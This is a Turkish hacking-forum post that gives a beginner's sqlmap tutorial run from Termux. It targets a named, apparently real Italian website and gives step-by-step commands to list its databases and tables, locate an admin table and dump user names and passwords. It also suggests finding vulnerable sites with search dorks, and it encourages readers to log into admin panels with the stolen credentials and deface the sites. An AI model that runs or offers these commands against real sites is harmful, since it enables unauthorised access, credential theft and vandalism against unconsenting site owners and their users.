Neler yeni

Sqlmap Kullanımı [Termux] (1 Viewer)

Mesajlar
195
Credits
102
Öncelikle termuxu açalalım ve sqlmap'i çalıştıralım sqlmapi çalıştırmayı bilmeyenler için şu komutlarla çalıştırıyoruz.
cd sqlmap yazıyor sonra python2 sqlmap.py yazıyoruz ve sqlmap çalışıyor.

Öncelikle sql açıklı bir site buluyorz bunuda dorklar yardımıyla bulabilirsiniz ben size örnek olarak site vereyim bunu kullanın öğrenmek için
site:http://www.marim.it/prodotti.php?id=498 bu siteyi kullanın şimdi geçelim sqlmap kullanımına.

python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 --dbs yazıyoruz ve sitenin databasesini çekiyoruz --dbs yazan sonraki kısımda 2 tane tire (-) var.
database.png
Eğer databaseleri doğru çektiysek böyle bi ekran gelir burda işarettede gördüğünüz gibi 2 tane database buldu 1.olan yani information_schema genelde her sitede olur bize lazım olan 2. olan siteden siteye 2.de yazan isim değişebilir şimdi bulduğumuz databaseden tabloları çekiceğiz onuda şu komutla
python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 -D wwwmarim --tables şeklinde yazıyoruz ve bu sayede databasemizin tablesını çekiyoruz tables yazan yerde 2 tane tire(-) var ona dikkat edelim wwwmarim yazan yerede database ismimizi yazıyoruz tabikide bu siteden siteye değişir yukarıdada söyledğim gibi tables.png
Eğer doğru yaptıysak böyle bir ekran gelir.Tablolarında çektiğimize göre sırada Columns ları çekme var oda şu şekilde burdaki tabloların hangisinde admin bilgilerinin olucağını düşünüyorsak onun bilgilerini çekmemiz gerek burda biraz isimler yabancı normalde admin users falan gibi kelimeler olur burdaki admin bilgilerin olduğu tablo ise utente yazan en altaki onun columnslarınıda şu şekilde çekiyoruz
python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 -D wwwmarim -T utente --columns yazarak utente adlı tablonun columnslarını çekeriz.
columns.png
Eğer bu şekilde yaptıysak doğru yapmışız demekdir.Şimdi çektiğimiz columnslardan admin bilgilerini çekiceğiz.Bakın resimdede gördüğünüz gibi password falan yazıyor bizede orda admin bilgileri için gerekli olan şeyleri çekiceğiz arkadaşlar ama sitede bir sorun var acale konu açmam gerektiğinden bakmamıştım password kısmı çekince ve nome hiçbişey yazmıyor siz başka sitelerde denerseniz yazdığını görürsünüz ben yinede size nasıl o bilgilerin çekilceğini göstereceğim oda şu komutla
python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 -D wwwmarim -T utente -C nome,password --dump şeklinde admin bilgileri elimize ulaşmış olucak.dump.png
Site sorunlu olduğu için nome ve password kısmı boş çıkdı siz başka sitelerde denerseniz dolu çıktığını görürsünüz ve o bilgilerle admin paneline girip siteye indexinizi yapıştırabilirsiniz.


Not: İLK KONUM OLDUĞUNDAN BİRAZ ACEMİCE OLMUŞ OLABİLİR KUSURA BAKMAYIN
ANLAMADIĞINIZ BİŞEY OLURSA FORUM CHATİNDEN BANA SORU SORABİLİRSİNSİZ TEŞEKÜRLER.
 

Bu konuyu görüntüleyen kullanıcılar